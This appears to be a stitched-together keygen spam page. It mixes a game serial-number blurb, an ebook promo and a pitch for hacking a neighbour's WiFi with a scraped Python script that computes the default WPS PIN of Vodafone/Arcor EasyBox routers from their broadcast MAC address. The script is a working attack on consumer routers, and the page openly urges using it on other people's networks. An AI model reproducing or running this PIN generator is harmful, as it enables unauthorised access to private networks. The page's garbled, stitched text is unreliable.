Easybox Wps Keygen For Mac
Choose the space battleship and shoot the chickens in the amazing game Chicken Invaders 2: The Next Wave Remastered! Chicken invader 2 serial number 1. Here you are to banish feathery invaders from the outer space, so be attentive and you’ll be a success.
Sap press books download free. SAP PRESS E‑Books. SAP PRESS is the leading publisher of SAP books and e‑books. All of our books are available in DRM-free e‑book format for download or for online reading. Access your e‑books anywhere, any time, on any device! Every E‑Book in Two to Four Formats.
Wifi Keygen 2015 is a free software application from the System Maintenance subcategory, part of the System Utilities category Hacking WiFi Password means free internet. If you want to hack someone WiFi password, this article is the perfect guide for you. No matter do you want to hack school, office, college or your neighbor wifi. WPS Connect for PC / Windows 7/8/10 / Mac / Computer – Free Download. You can use WPS Connect for PC/laptop, on Mac, iOS and Windows. Speedy WPS Connect for PC is very quick. It can scan through several WI-FI networks in seconds and quickly connect you to the best WI-FI it identifies.
PermalinkJoin GitHub today
GitHub is home to over 50 million developers working together to host and review code, manage projects, and build software together.
Sign upBranch:master
#!/usr/bin/env python |
# |
# source & algorithm scripted & modded by .:: crazyjunkie ::. 2014 |
# source for your profit working |
# use only on own source |
# |
# Vodafone EasyBox default wps pin algorithm |
importsys, re |
defgen_pin (mac_str, sn): |
mac_int= [int(x, 16) forxinmac_str] |
sn_int= [0]*5+[int(x) forxinsn[5:]] |
hpin= [0] *7 |
k1= (sn_int[6] +sn_int[7] +mac_int[10] +mac_int[11]) &0xF |
k2= (sn_int[8] +sn_int[9] +mac_int[8] +mac_int[9]) &0xF |
hpin[0] =k1^sn_int[9]; |
hpin[1] =k1^sn_int[8]; |
hpin[2] =k2^mac_int[9]; |
hpin[3] =k2^mac_int[10]; |
hpin[4] =mac_int[10] ^sn_int[9]; |
hpin[5] =mac_int[11] ^sn_int[8]; |
hpin[6] =k1^sn_int[7]; |
pin=int('%1X%1X%1X%1X%1X%1X%1X'% (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], |
hpin[6]), 16) %10000000 |
# WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or |
# http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc |
accum=0 |
t=pin |
while (t): |
accum+=3* (t%10) |
t/=10 |
accum+=t%10 |
t/=10 |
return'%i%i'% (pin, (10-accum%10) %10) |
defmain(): |
iflen(sys.argv) !=2: |
sys.exit('usage: easybox_wps.py [BSSID]n eg. easybox_wps.py 38:22:9D:11:22:33n') |
mac_str=re.sub(r'[^a-fA-F0-9]', ', sys.argv[1]) |
iflen(mac_str) !=12: |
sys.exit('check MAC format!n') |
sn='R----%05i'%int(mac_str[8:12], 16) |
print'derived serial number:', sn |
print'SSID: Arcor EasyBox Vodafone-%c%c%c%c%c%c'% (mac_str[6], mac_str[7], mac_str[8], |
mac_str[9], sn[5], sn[9]) |
print'WPS pin:', gen_pin(mac_str, sn) |
if__name__'__main__': |
main() |
Copy lines Copy permalink